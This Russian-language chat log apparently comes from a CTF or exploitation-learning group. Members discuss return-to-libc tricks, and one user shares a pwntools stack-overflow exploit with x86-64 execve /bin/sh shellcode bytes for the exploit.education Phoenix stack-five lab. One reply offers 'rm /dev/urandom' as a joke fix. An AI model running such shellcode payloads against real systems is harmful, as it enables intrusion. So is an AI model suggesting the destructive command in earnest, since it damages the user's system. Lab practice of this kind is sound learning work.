я не уверен на счет этой конкретной задачи, но да реально. libc_start_main

и там другие функи иногда лежат

так по адресу лежит код же

а мне нужно, чтобы по адресу лежал адрес)

а положить адрес, который ссылается на libc функу со стека  можно?

хз, буду думать)

если у тебя есть контроль над стеком, это вполне возможно

ну так пропатчь argv[0] чтоб он указывал не на строчку, а на место где libc_start_main_ret

как уменьшить пул энтропии /dev/urandom ?

rm /dev/urandom ; echo LOL > /dev/urandom

В /proc/sys/kernel/random/poolsize?

aga

вернее в /proc/sys/kernel/random/entropy_avail

Неа

Этот файлик вообще ро должен быть, вроде

Там показывается насколько заполнен пул

Всем привет, возникла проблема с заданием https://exploit.education/phoenix/stack-five/ . Заполняю буфер nop'ами, потом за ними шеллкод, далее дозаполняю мусором буфер, перезаписываю rbp мусором, а rip перезаписываю на начало буфера. Делал \xcc перед шеллом- в gdb trace/breakpoint trap, инструкции шелла выполняются, но на push rsp - segmentation fault. шеллкод - http://shell-storm.org/shellcode/files/shellcode-806.php. при запуске через $(python exploit.py; cat) | путь до исполняемого файла - ничего не пишет, даже trace/breakpoint trap. код сплоита:  from pwn import *
buff = ""
buff += '\x90'*30
buff += '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
buff += 'A'* (128 - len(buff))  
buff += 'BBBBBBBB'  
buff += p64(0x7fffffffebe0)  
print(buff)

почему g-recaptcha может исчезать, когда рядом появляется объект iframe?

то есть без iframe на этом же сайте норм, как только добавляю - не появляется

куда он ведет